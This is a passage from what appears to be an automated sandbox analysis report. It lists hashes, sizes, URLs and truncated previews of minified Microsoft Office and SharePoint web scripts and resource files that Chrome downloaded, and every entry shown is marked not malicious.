jHmmT0HsKmWmSzoY_mtIYeb3QmL24ThOhZ9Tk&cTag=%22c%3A%7BA036A73C-8B27-4646-BE73-6C7CAF3F8055%7D%2C1%22&encodeFailures=1&width=285&height=215&srcWidth=1262&srcHeight=952
                              Preview:.PNG........IHDR..............2V.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............pHYs...%...%.IR$.....tIME......&~E.e..p)IDATx..wx\...}..U....U.\.n.K....B v..~....$.0...|.z7...n.p.].l..KV..2.?....bC@|..}..X..vg.=;gf.9...................."t.....E.(((.(..QPP.P4].#.@..n......~..w-......Wo.i........._...>];....vo.{.q=..{k.L........>[gBo..6Fg...5......iiia....7..N.u..9r$....!.;v,.6l@.$....i.c.!!!.E..a6.)**..p.f...f3S.L..t..'....HAA..6mb.A....PUU.U..z....1f..$Ib....v$Ib......f........b.q....z.j....5j.C..a.}455QTTDqq1.......z.j.v;....G...G]]..V.....a......~...E..3m.4l6....j.2t.P........:t......x.5j.....>|.)S.....m.8q"f....7RWW..^..``.%....h...c...l........Cnn..W.F.ATT.......v{A..<.m.6m....t.>..\......F..Ehh(...|...=z...l..K@@.eee....=.I.hjjb...8p...Z....u....!//.o........Y.b.V...JEnn.:..C..1f..t:.;v. 44.#G........g...t:.n.J[[..'Nd...........+...............l466..R.........$...X.d.........i.&....4i.....>|X.{....f&M.Dtt4+V. 66.....
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (5206)
                              Category:downloaded
                              Size (bytes):18518
                              Entropy (8bit):5.449740626505189
                              Encrypted:false
                              SSDEEP:
                              MD5:3F88E32895599F9C209C833D53521E44
                              SHA1:3A5F1BA5437415C607410749C02189993E09EFEB
                              SHA-256:41CAB59D24035513683B7C77CD6E101BE98E278790C9F3BA40BF56FB4D018BE3
                              SHA-512:E23B01655E441B980D8E3FFB165810DC2A848755530F18774439F320A3A103F9E2E56EF7519B22A54E6FE55DBDAA6EBE8C0CB5936FCE5B1BFC7BF2A546313E6E
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/8.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[8],{6088:function(e,t,n){n.d(t,{a:function(){return s}});var a=n(20),i=n(6089),r=n(6087),o=n("odsp.util_578");function s(e){var t,n=e.key,s=n.listFullUrl,c=n.itemId,d=n.rootFolder,l=e.listData,u=l.ListTitle,f=l.ListTemplateType,p=e.pageContext;if(c||d){if(d){var m=(0,r.a)(d,s);m>-1&&(t=d.substring(m+1))}}else t="string"==typeof f&&Number(f)===a.c.mySiteDocumentLibrary?(null==p?void 0:p.isMySiteOwner)||(null==p?void 0:p.isSiteOwner)||!(null==p?void 0:p.webTitle)?i.a:(0,o.OO)(i.b,p.webTitle):u;return t}}.,3689:function(e,t,n){n.d(t,{a:function(){return m},b:function(){return h},c:function(){return _},d:function(){return p},e:function(){return d},f:function(){return u},g:function(){return c},h:function(){return f},i:function(){return l}});var a=n(47),i=n(3026),r=n(1563),o=n(1562),s=n(3687);function c(e){return!!e.RemoteItem}function d(e){return!c(e)&&1===Number(e["Created_x0020_Date.ifnew"])}function l(e){return
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (817)
                              Category:downloaded
                              Size (bytes):1115
                              Entropy (8bit):5.027363192802006
                              Encrypted:false
                              SSDEEP:
                              MD5:F5C78A8536F7F2F068E250565CF1CD6E
                              SHA1:9F95A5BEE4B0EB02B30767C212A3EF3614A910A7
                              SHA-256:DB7DA59050BE5858D9DB0F71CAAFC6E2A2D0EE4F9AA224C7B3CE7DC2A59D4023
                              SHA-512:2A2785FBCC6BDF5A1D4865A16D1CCDB9C082E418FCB58CA5C17DCB9C5133B5533875A097202F66EE765C6EC9681D9DEA7DB1BFBE7608FBCCA005E7301BCDAFA2
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/freemiumlistshomewebpack/de/deferred.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["deferred.resx"],{393:e=>{e.exports=JSON.parse('{"a":"Feedback an Microsoft senden"}')}.,315:e=>{e.exports=JSON.parse('{"a":"Eigene Dateien"}')}.,386:e=>{e.exports=JSON.parse('{"a":"Bibliothekseinstellungen"}')}.,387:e=>{e.exports=JSON.parse('{"a":"App hinzuf.gen","b":"Markencenter (Vorschau)","c":"Markencenter","d":"Erscheinungsbild .ndern","j":"Bibliothekseinstellungen","k":"Listeneinstellungen","r":"Websiteverwendung","s":"Websiteinhalt","w":"Websiteeinstellungen","u":"Websiteberechtigungen","t":"Websiteinformationen","i":"Hub-Websiteeinstellungen","m":"Papierkorb","p":"Neuigkeiten","q":"Abmelden","h":"Hilfe","v":"Website-Entw.rfe","f":"Globale Navigation","x":"Eine Websitevorlage anwenden","l":"OneDrive-Einstellung","o":"Ihr OneDrive wiederherstellen","g":"Mit neuer Microsoft 365-Gruppe verbinden","n":"Diese Bibliothek wiederherstellen","B":"Verwalten von Viva Connections","A":"Viva Connections einrich
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (5178)
                              Category:downloaded
                              Size (bytes):9993
                              Entropy (8bit):5.216880423367557
                              Encrypted:false
                              SSDEEP:
                              MD5:5AB0BA3BE2B19B3382ED89B73944B1DF
                              SHA1:433174CD333AFE467748EF5AA997D3C78522F29E
                              SHA-256:6F407DF47A20668118161A5562779339A85ED132FC1585F2D35487544A0F8CFD
                              SHA-512:ED94D03CA36952F2C40921FE542CEAF75CF88E5A70C069BD5427A257243ADAAAA22145834CBB342351AB2E17AE2F14C6F88047C16CEDAE584959BFC09E157B2F
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/91192.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[91192],{802345:(e,t,n)=>{n.d(t,{a:()=>m});var a=n(295610),i=n(408156),r=n(551514),o=n(209446),s=n(646889),c=n(138968),d=n(183347),l=n(126640),u=n(274812),f=n(988347),p=(0,d.NF)(function(e,t,n){var i=(0,l.W)(e),r=(0,u.W)(e),o={root:{minWidth:"80px",height:"32px"},label:{fontWeight:c.uq.semibold}};return(0,c.L$)(i,o,n?function(e){var t,n,i,r,o,s,d,l,u,p=e.palette,m=e.semanticColors;return{root:{backgroundColor:m.primaryButtonBackground,border:"1px solid ".concat(m.primaryButtonBackground),color:m.primaryButtonText,selectors:(t={},t[c.hJ]=(0,a.__assign)({color:"Window",backgroundColor:"WindowText",borderColor:"WindowText"},(0,c.IM)()),t[".".concat(f.M$," &:focus")]={selectors:{":after":{border:"none",outlineColor:p.white}}},t)},rootHovered:{backgroundColor:m.primaryButtonBackgroundHovered,border:"1px solid ".concat(m.primaryButtonBackgroundHovered),color:m.primaryButtonTextHovered,selectors:(n=
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (12199)
                              Category:downloaded
                              Size (bytes):627483
                              Entropy (8bit):4.971678760956616
                              Encrypted:false
                              SSDEEP:
                              MD5:BFAF036D2143656A972B1B8DF2F33286
                              SHA1:41E5B353D4BA129DBF95F0AF5C6BE9F8D9B08D1D
                              SHA-256:74C954914C4513EE5F62F4F538BD4EC1C5F08E5936EFAF51452C9E6F84B93519
                              SHA-512:F879CF29028A4DF2A62701E47ED16C8164D640DF1C9BF45F27F0F68D846C3DFD10678856886E3DF332B415E98703A89323E813BF9A806FF1BB176E4D7E08DFCA
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/es/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{5223:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,5968:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1325)
                              Category:downloaded
                              Size (bytes):3083
                              Entropy (8bit):5.213639274985426
                              Encrypted:false
                              SSDEEP:
                              MD5:E05DEB3AB709147F49B4700C1C1A1127
                              SHA1:CC8561E9C2DBF614CB74FA2CCAF6DFC5648DDBD6
                              SHA-256:0F69B54BB38892F99E14AE64BBB42430EFF8E74A61A05451571386D94F388627
                              SHA-512:289AE76F2A07A1E818E55C1CDBF93AD387DCC35D72FFE8CB2966B6E3A2E86E037015745DB612E931977E61B91A3590AFB8067205C12CACB08CF7B25134BBA3F9
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/metaosodbfilebrowser.js
                              Preview:"use strict";var __webpack_result__;(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["metaosodbfilebrowser"],{23:(e,t,n)=>{n.d(t,{a:()=>o,b:()=>r,c:()=>s,d:()=>c});var a=new Map,i=function(){function e(e,t){void 0===t&&(t={}),this.name=e;var n=t.dependentCounter;this._dependenentCounter=n,this._total=void 0}return e.prototype.add=function(e){this._dependenentCounter&&this._dependenentCounter.add(1),void 0===this._total&&(this._total=0),this._total+=e},e.prototype.read=function(){return this._total},e.prototype.reset=function(){this._total=0},e}();function r(){var e={};return a.forEach(function(t,n){var a=t.read();void 0!==a&&(e[n]=a)}),e}function o(e,t){var n=a.get(e);if(n)throw new Error("Counter named '".concat(e,"' is already defined."));return n=new i(e,t),a.set(e,n),n}function s(e){return a.get(e)}function c(e){a.forEach(function(t,n){e&&!(n in e)||t.reset()})}}.,22:(e,t,n)=>{(0,n("fui.util_150").pZ)(JSON.parse("[]"))}.,19:(e,t,n)=>{var a=n("react-lib"),i=n("react-
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (15890)
                              Category:downloaded
                              Size (bytes):111598
                              Entropy (8bit):5.499890885286899
                              Encrypted:false
                              SSDEEP:
                              MD5:AFEBF4E564CBFE59C21CA77969AEC03D
                              SHA1:4EDD8279D91D66BA55E0883333A122156A27785E
                              SHA-256:8F050DC153120CDF2AB1E7DCECF505404D4985393F1082C02C8FACE982DF2BAE
                              SHA-512:213CF9E882FA83CA2A022EED4BAC4DC135BB960364C09C23FCC3B4EE45F7246DE098D98DC489E6E8BCB7541EBF3812101D98C76BF21777A2C4E34BE68E2B36C8
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/101.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[101,100],{1385:(e,t,n)=>{n.d(t,{a:()=>r});var a=n("tslib_102"),i=n(1044);function r(e,t){return(0,a.Zd)(this,void 0,void 0,function(){var n,r,o,s,c,d,l,u,f,p,m,_,h,b,g,v,y,S,D,I,x;return(0,a.qr)(this,function(a){switch(a.label){case 0:for(r=(n=e||{}).items,o=n.formValues,s=n.folderPath,c=n.webAbsoluteUrl,d=n.fullListUrl,l=n.qosName,u=n.bNewDocumentUpdate,f=n.checkInComment,p=t.dataRequestor,m=[],_=0,h=r;_<h.length;_++)b=h[_],m.push(parseInt(b.sharepointId,10));return r[0]?(g=(0,i.b)({webAbsoluteUrl:c,listFullUrl:d}).method("BulkValidateUpdateListItems").toString(),v={itemIds:m,formValues:o,folderPath:s,bNewDocumentUpdate:u,checkInComment:f},[4,p.getData({additionalPostData:JSON.stringify(v),method:"POST",qosName:l,url:g,webAbsoluteUrl:c,noRedirect:!0})]):[2];case 1:for(y=a.sent(),S="",D=0,I=y.d.BulkValidateUpdateListItems.results;D<I.length;D++)(x=I[D]).HasException&&(S=x.ErrorMessage+"\n"+S);if(S)throw new E
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (57957)
                              Category:downloaded
                              Size (bytes):84893
                              Entropy (8bit):5.219789361942861
                              Encrypted:false
                              SSDEEP:
                              MD5:695E78BF03484E95FCC72465B75DC767
                              SHA1:C51E6D9BA49AFB287B7756EF711CEBF5C374146E
                              SHA-256:C57DB6AA7333EF99E370F33F8F9582D7FB22BB19386DFBFE21D0742CB3B21271
                              SHA-512:ADF6199D525D0571B2E058702DDB245C0FBEFDE920CC7C311FD305D8823D99B145C82145D0F0A27A9701AD5228139F6039767CBC3BDD7D3BF2AF58918E43829F
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/42945.js
                              Preview:/*! For license information please see 42945.js.LICENSE.txt */."use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[42945],{645457:(e,t,n)=>{n.d(t,{k:()=>o});var a=n(692217),i=n(408156),r=n(862279);const o=e=>{const t=i.createContext({value:{current:e},version:{current:-1},listeners:[]});var n;return t.Provider=(n=t.Provider,e=>{const t=i.useRef(e.value),o=i.useRef(0),s=i.useRef();return s.current||(s.current={value:t,version:o,listeners:[]}),(0,a.L)(()=>{t.current=e.value,o.current+=1,(0,r.unstable_runWithPriority)(r.unstable_NormalPriority,()=>{s.current.listeners.forEach(t=>{t([o.current,e.value])})})},[e.value]),i.createElement(n,{value:s.current},e.children)}),delete t.Consumer,t}}.,643e3:(e,t,n)=>{n.d(t,{S:()=>r});var a=n(692217),i=n(408156);const r=(e,t)=>{const n=i.useContext(e),{value:{current:r},version:{current:s},listeners:c}=n,d=t(r),[l,u]=i.useReducer((e,n)=>{if(!n)return[r,d];if(n[0]<=s)return o(e[1],d)?e:[r,d];try{if(o(e[0],n[1
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3806)
                              Category:downloaded
                              Size (bytes):4045
                              Entropy (8bit):5.108943931702333
                              Encrypted:false
                              SSDEEP:
                              MD5:D8EE75813346989ACAAA28EBBFE67BBB
                              SHA1:AB91E555D2C69EE18103B6084DA307DD9977EEA7
                              SHA-256:A3B9D3622BE108BDD351E075C924F5B746D999B54275FFF182CD3CDCAF01196A
                              SHA-512:C1820D53443F1BC0319FFBDD0CC6986D602FDEA8FAEE5453DBE3F72F214F28BAC0719BBA73EB75FCA9AB7C26E2B903B6B4A85770768C8CCC724ED6EDBC8955D2
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/deferred.odsp-datasources.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["deferred.odsp-datasources"],{2064:(e,t,n)=>{var a;n.d(t,{a:()=>a}),function(e){e[e.anonymous=1]="anonymous",e[e.msa=2]="msa",e[e.aad=3]="aad"}(a||(a={}))}.,2063:(e,t,n)=>{n.d(t,{a:()=>r,b:()=>o});var a=n("tslib_102"),i=n(78),r=function(){function e(e){var t=e.webAbsoluteUrl,n=e.encodeWebAbsoluteUrl,a=void 0===n||n;this._webAbsoluteUrl=t,this._encodeWebAbsoluteUrl=a,this._segments=[],this._parameters=[],this._rawParameters=[],this._lastParameterId=0}return e.prototype.toString=function(){var e,t=[];this._parameters.length&&t.push(this._parameters.map(function(e){var t=e.name,n=e.serializedValue;return"".concat(t,"=").concat(n)}).join("&")),t.push.apply(t,this._rawParameters),e=t.length?"?".concat(t.join("&")):"";var n=this._webUrl||this._webAbsoluteUrl||"",i=n.indexOf("?"),r=i>-1?n.slice(0,i):n,o=(0,a.AE)([this._encodeWebAbsoluteUrl?encodeURI(r):r,"_api"],this._segments,!0);return"".concat(o.join("/")).concat
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (16882)
                              Category:downloaded
                              Size (bytes):26977
                              Entropy (8bit):5.380850842491837
                              Encrypted:false
                              SSDEEP:
                              MD5:587234F00633E0351C8BE2CA20AE3169
                              SHA1:0276B84EDDC7AB008734FA6A4518CA41DD29D00B
                              SHA-256:4BFC9367524C54771E88F1A7EE2643F04A1A87EEDBCCE9FB84FE98E2184A1883
                              SHA-512:6E3F4455B0F30CFBFFEC071F55F9417B219F6FF7579A80445A8CB9317A9D2D7B9B1C4039CCA781F916D0E56AEC1E10AF3945AF3FCD18485FFEF58CD4B926CC50
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/17.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[17],{3683:function(e,t,n){n.d(t,{a:function(){return y}});var a=n("tslib_102"),i=n(27),r=n(28),o=n(45),s=n(184),c=n(121),d=n(8),l=n(43),u=n(1361),f=n(213),p=n(24),m=n(14),_=n(55),h=n(106),b=n("odsp.util_578"),g=n(109);function v(e){var t=this,n=new l.a(e.endpoint).authority;return function(i){return(0,a.Zd)(t,void 0,void 0,function(){var t,r,o,s,u,v,y,S,D,I,x;return(0,a.qr)(this,function(a){switch(a.label){case 0:return t=c.a.serialize({tenantRootUrl:n}),r={endpoint:e.endpoint,tenantRootUrl:n},o=new m.a({name:"GetMyOneDriveUrl.UserOneDriveEndpoint",extraData:r}),b.HW.isActivated("810CC8F7-AE82-42B8-8625-6D144C4336AD")?[3,2]:[4,i((0,g.a)(function(e){return{spItem:e.demandItemFacet(d.a,t,{suppressGetItems:!1}),error:e.demandItemFacet(_.b,t,{suppressGetItems:!0})}}))];case 1:return S=a.sent(),s=S.spItem,u=S.error,[3,4];case 2:return[4,i((0,f.a)({items:(D={},D[t]={demands:(I={},I[d.a.id]={},I)},D)}))];case 3:a.se
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (7144)
                              Category:downloaded
                              Size (bytes):12586
                              Entropy (8bit):5.532899441579069
                              Encrypted:false
                              SSDEEP:
                              MD5:5B9F5153AA2736FD166C9497C627FE44
                              SHA1:51B6C2CD8E63E5A273C47D1B56F44191F3778D2F
                              SHA-256:CB02420681972EF7DEE724BB67368635499E5A1E7CB2FA169EA5FDF3A6550064
                              SHA-512:AC6FBBB822767EA3A364D00B90A19AD407472AA8BC456D1BFCB8F0AA7FA1AA91A2AC48F59D4AB2AD04783C30CB80E4263AB11E5944967D52BBB183E6E4D4FA47
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/29728.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[29728],{52647:(e,t,n)=>{n.d(t,{o:()=>m});var a=n(408156),i=n(235094),r=n(336505),o=n(923047),s=n(445997),c=n(274501),d=n(878542),l=n(218777),u=n(14813),f=n(730429),p=n(402904);const m=a.forwardRef((e,t)=>{const n=((e,t)=>{const n=(0,c.Ab)(e=>e.contentRef),a=(0,c.Ab)(e=>e.openOnHover),d=(0,c.Ab)(e=>e.setOpen),l=(0,c.Ab)(e=>e.mountNode),u=(0,c.Ab)(e=>e.arrowRef),f=(0,c.Ab)(e=>e.size),p=(0,c.Ab)(e=>e.withArrow),m=(0,c.Ab)(e=>e.appearance),_=(0,c.Ab)(e=>e.trapFocus),h=(0,c.Ab)(e=>e.inertTrapFocus),b=(0,c.Ab)(e=>e.inline),{modalAttributes:g}=(0,s.e)({trapFocus:_,legacyTrapFocus:!h,alwaysFocusable:!_}),v={inline:b,appearance:m,withArrow:p,size:f,arrowRef:u,mountNode:l,components:{root:"div"},root:i.wx((0,r.h)("div",{ref:(0,o.r)(t,n),role:_?"dialog":"group","aria-modal":!!_||void 0,...g,...e}),{elementType:"div"})},{onMouseEnter:y,onMouseLeave:S,onKeyDown:D}=v.root;return v.root.onMouseEnter=e=>{a&
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (41492)
                              Category:downloaded
                              Size (bytes):145287
                              Entropy (8bit):5.561050764903384
                              Encrypted:false
                              SSDEEP:
                              MD5:12609C7F36C2176CC5825E0819CBB652
                              SHA1:3D17AECA6C39B04C59FA25E77EA5557DCAC62CE5
                              SHA-256:4ECA3CD47F9ADCC596283D4781D267DF78143BA1D47C9DB8F128AFDF38CCF08D
                              SHA-512:D1AAE89D04B07800E7366DE56F3301A5697E96EE7D1F63634E20FA5B52CC66CA112B451EC947B34D8BB5114455DF4560232C1361E7D0402C023F684EA101FD12
                              Malicious:false
                              Reputation:unknown
                              URL:https://shell.cdn.office.net/api/ShellBootstrapper/business/OneShell
                              Preview://BuildVersion 1.20240413.3.0.var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_bootstrapper_start"),function(){var e,t,n,a,r={9610:function(e){e.exports="data:font/woff;charset=utf-8;base64,d09GRgABAAAAAAmoAA4AAAAAExwAA5R8AAAAAAAAAAAAAAAAAAAAAAAAAABPUy8yAAABRAAAAEgAAABgMWd7ZGNtYXAAAAGMAAAAPQAAAVLnkt3NY3Z0IAAAAcwAAAAgAAAAKgnZCa9mcGdtAAAB7AAAAPAAAAFZ/J7mjmdhc3AAAALcAAAADAAAAAwACAAbZ2x5ZgAAAugAAAGhAAADZMkacS9oZWFkAAAEjAAAADIAAAA2AQjyc2hoZWEAAATAAAAAFQAAACQQAQgDaG10eAAABNgAAAAMAAAADA0qASZsb2NhAAAE5AAAAAoAAAAKAiQA2G1heHAAAATwAAAAHQAAACAAIgIObmFtZQAABRAAAAP4AAAJ+pGb8VNwb3N0AAAJCAAAABQAAAAg/1EAe3ByZXAAAAkcAAAAiQAAANN4vfIOeJxjYGH3YpzAwMrAwDqL1ZiBgVEaQjNfZEhjEuJgZeViZGIEAwYgEGBAAN9gBQUGh+eKXx5wgPkQkgGsjgXCU2BgAADOIQhyeJxjYGBgZoBgGQZGBhDwAfIYwXwWBgMgzQGETAwMzxWfV3958P8/giXxUKKNWxmqCwwY2RhGPAAA9FQPGwAAAHicY9BiCGUoYGhgWMXIwNjA7MB4gMEBiwgQAACqHAeVeJxdj79Ow0AM
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1247)
                              Category:downloaded
                              Size (bytes):2559
                              Entropy (8bit):5.312184769701199
                              Encrypted:false
                              SSDEEP:
                              MD5:38E6D843470E7A414832339B70F2B431
                              SHA1:49D3BBE8950A8B94C31D12BBA74A05A772E11007
                              SHA-256:34886476357BF09EFB9CD5384757BEAFC22673AEAF03E108EAEE22EE4721335C
                              SHA-512:E35EE8B3410474200600D9BD89DD7B08A68A607126C570450891009D2145EEB4C570AC619469F165845E8EE6610A305872B81B0BE9B6C9E21AC04F1136D24270
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/79.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[79],{1131:(e,t,n)=>{n.d(t,{a:()=>i});var a=n("odsp.util_578"),i=new a.qT({name:"ItemLikeRatingDataSource.key",loader:new a.g6(function(){return Promise.all([n.e("deferred.odsp-common"),n.e("deferred.odsp-datasources"),n.e("deferred"),n.e(195)]).then(n.bind(n,1509)).then(function(e){return e.resourceKey})})})}.,1600:(e,t,n)=>{n.d(t,{a:()=>d});var a=n("tslib_102"),i=n("odsp.util_578"),r=n(1131),o=n(4),s=n(17),c=n(2),d=new i.qT({name:"rateCommand",factory:{dependencies:{pageContext:o.a,getDataSource:r.a.async.lazy,listItemStore:s.a},create:function(e){var t=e.pageContext,n=e.getDataSource,i=e.listItemStore;return{instance:function(e,r,o){return(0,a.Zd)(this,void 0,void 0,function(){var s,d,l,u,f,p,m,_,h;return(0,a.qr)(this,function(b){switch(b.label){case 0:return[4,n()];case 1:return s=b.sent(),(0,c.ob)()?[3,3]:[4,s.setRating(e,t.listId,r)];case 2:return b.sent(),[3,4];case 3:s.setRating(e,t.listId,r),b.label=4
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1539)
                              Category:downloaded
                              Size (bytes):3202
                              Entropy (8bit):5.191387496490042
                              Encrypted:false
                              SSDEEP:
                              MD5:4C25DD5F4AE79198E901863DE0A10F40
                              SHA1:B1A597545D6151B36872F660A761758DCCA1C0D0
                              SHA-256:67B4BB0F147F1060BF67C5FA7E4DD148EDF4FF4E057496F9D4A835A8586113CC
                              SHA-512:F1C86947901DB3100641C34CA04DB0C49CB82DB55B1995CBF068E8BD20C29C95092F2C07D2CA665B8BBCB7317B74732194437456D37CD8B665CE776E1A0E3CBE
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/227.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[227],{827:(e,t,n)=>{n.d(t,{a:()=>s});var a=n("tslib_102"),i=n(38),r=n(2063),o=function(e){function t(t,n){var a=e.call(this,{webAbsoluteUrl:n.pageContext.webAbsoluteUrl,encodeWebAbsoluteUrl:n.encodeWebAbsoluteUrl})||this;return a._pageContext=n.pageContext,a._shouldEncodeWebAbsoluteUrl=n.encodeWebAbsoluteUrl,a._itemUrlHelper=n.itemUrlHelper,a}return(0,a.XJ)(t,e),t.prototype.webByUrl=function(e){return this.webByItemUrl(this._itemUrlHelper.getUrlParts(e))},t.prototype.webByItemUrl=function(e){var t=e.siteRelation,n=e.isCrossDomain,a=e.fullItemUrl,r=this;return(n||t===i.d.crossSite)&&(r=r.method("SP.RemoteWeb",a)),r.segment("web")},t.prototype.listById=function(e,t){return this.webByItemUrl(e).segment("lists").method("GetById",t)},t.prototype.clone=function(){return new t({webAbsoluteUrl:this._pageContext.webAbsoluteUrl},{pageContext:this._pageContext,itemUrlHelper:this._itemUrlHelper,encodeWebAbsoluteUrl:this.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (886)
                              Category:downloaded
                              Size (bytes):1202
                              Entropy (8bit):5.011409191560589
                              Encrypted:false
                              SSDEEP:
                              MD5:E7366FC7C8223DFE2339B8AEEA3354B7
                              SHA1:DD0858368D67F281F6F772C0662D4644BA1A614F
                              SHA-256:4160BB498344BFF1D2D1CAEED01FDF5091E8086CCA15A364958ED860B17FB00A
                              SHA-512:6DFCE00BD0ECEBFDB315138A1D23B23318EE767AB9A16C6276F1B92F08F5E288C7E48DB4A8F0F028E63B4B20CB99D78F74299CE06AA5C4BFBC308A98FD603C96
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/freemiumlistshomewebpack/es/deferred.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["deferred.resx"],{393:e=>{e.exports=JSON.parse('{"a":"Enviar comentarios a Microsoft"}')}.,315:e=>{e.exports=JSON.parse('{"a":"Mis archivos"}')}.,386:e=>{e.exports=JSON.parse('{"a":"Configuraci.n de la biblioteca"}')}.,387:e=>{e.exports=JSON.parse('{"a":"Agregar una aplicaci.n","b":"Centro de marcas (versi.n preliminar)","c":"Centro de marca","d":"Cambio del aspecto","j":"Configuraci.n de la biblioteca","k":"Configuraci.n de la lista","r":"Uso del sitio","s":"Contenido del sitio","w":"Configuraci.n del sitio","u":"Permisos del sitio","t":"Informaci.n del sitio","i":"Configuraci.n del sitio concentrador","m":"Papelera de reciclaje","p":"Novedades","q":"Cerrar sesi.n","h":"Ayuda","v":"Dise.os del sitio","f":"Navegaci.n global","x":"Aplicar una plantilla de sitio","l":"Configuraci.n de OneDrive","o":"Restaurar tu OneDrive","g":"Conectar al nuevo grupo de Microsoft 365","n":"Restaurar esta biblioteca"
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (36907)
                              Category:downloaded
                              Size (bytes):247511
                              Entropy (8bit):5.312221612610899
                              Encrypted:false
                              SSDEEP:
                              MD5:750D29EA1451C2E09C2355DD93F4685B
                              SHA1:06773C74D3ED038DED97899CBF48178803449E86
                              SHA-256:979B342E176290AADC7036D87D8D98AA24D8BF63224E89EC551397BBEC812141
                              SHA-512:3FB109854CACDF4C10BB165602854153486210B585FB6CC7937B29244D6B25B94CEBB900C9428A4C2E0D49DE71CEF372397749059ED8395DFAF6AD547969FDF3
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/35.js
